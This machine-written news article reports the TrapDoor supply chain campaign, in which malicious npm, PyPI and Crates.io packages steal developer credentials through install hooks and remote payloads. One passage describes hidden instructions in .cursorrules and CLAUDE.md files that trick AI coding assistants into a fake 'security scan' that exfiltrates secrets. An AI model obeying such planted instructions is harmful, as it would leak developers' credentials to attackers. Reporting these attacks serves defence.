Ethical Hacking News
A new supply chain attack campaign dubbed TrapDoor has been discovered, using multiple popular open-source ecosystems to distribute credential-stealing malware. The malicious campaign leverages postinstall hooks, remote JavaScript payloads, and build scripts to execute malicious code and exfiltrate sensitive information from unsuspecting developers.
The TrapDoor campaign is a sophisticated supply chain attack that leverages multiple popular open-source ecosystems to distribute credential-stealing malware. The campaign involves the publication of over 34 malicious packages across npm, PyPI, and Crates.io, targeting specific ecosystems and communities. The attack uses postinstall hooks, remote JavaScript payloads, and build scripts to execute malicious code and exfiltrate sensitive information. The malicious Python packages can download and run a remote JavaScript payload, allowing for more flexibility in the attack. The campaign demonstrates the evolving nature of supply chain attacks, combining traditional package typosquatting with newer developer-environment attack paths.
In a disturbing development that highlights the evolving nature of cybersecurity threats, a sophisticated supply chain attack campaign has been discovered that leverages multiple popular open-source ecosystems to distribute credential-stealing malware. The malicious campaign, dubbed TrapDoor, has already shown significant success in its ability to evade detection and steal sensitive information from unsuspecting developers.
According to recent reports, the TrapDoor campaign involves the publication of over 34 malicious packages across npm, PyPI, and Crates.io, with each package designed to target specific ecosystems and communities. The attack is notable for its use of postinstall hooks, remote JavaScript payloads, and build scripts to execute malicious code and exfiltrate sensitive information.
At the heart of the TrapDoor campaign lies a complex network of packages that masquerade as harmless tools, allowing attackers to reach a broad audience. These packages are designed to scan for credentials and developer secrets, validate stolen credentials using AWS and GitHub API calls, and create persistence on the host using cron jobs, systemd services, Git hooks, and SSH.
The malicious Python packages associated with TrapDoor are particularly noteworthy for their ability to download JavaScript from an attacker-controlled domain and run it using "node -e". This technique allows the package to delegate execution to a remote JavaScript payload, giving the attacker more flexibility after publication. Furthermore, the use of hidden instructions in .cursorrules and CLAUDE.md files contains clever social engineering tactics that trick artificial intelligence (AI) assistants into running a "security scan" that results in secret discovery and exfiltration.
The findings highlight how threat actors are increasingly targeting developer workflows to steal sensitive information that can be used for follow-on attacks. The TrapDoor campaign demonstrates the evolving nature of supply chain attacks, which now often involve combining traditional package typosquatting with newer developer-environment attack paths.
The TrapDoor campaign serves as a wake-up call for developers and organizations alike, emphasizing the importance of staying vigilant in today's digital landscape. As we continue to rely on open-source ecosystems and developer workflows, it is essential that we prioritize cybersecurity awareness and implement robust security measures to protect our sensitive information from these increasingly sophisticated threats.
Related Information:
https://www.ethicalhackingnews.com/articles/A-New-Layer-of-Deception-The-Sophisticated-TrapDoor-Supply-Chain-Attack-Campaign-ehn.shtml
https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
Published: Mon May 25 02:55:32 2026 by llama3.2 3B Q4_K_M
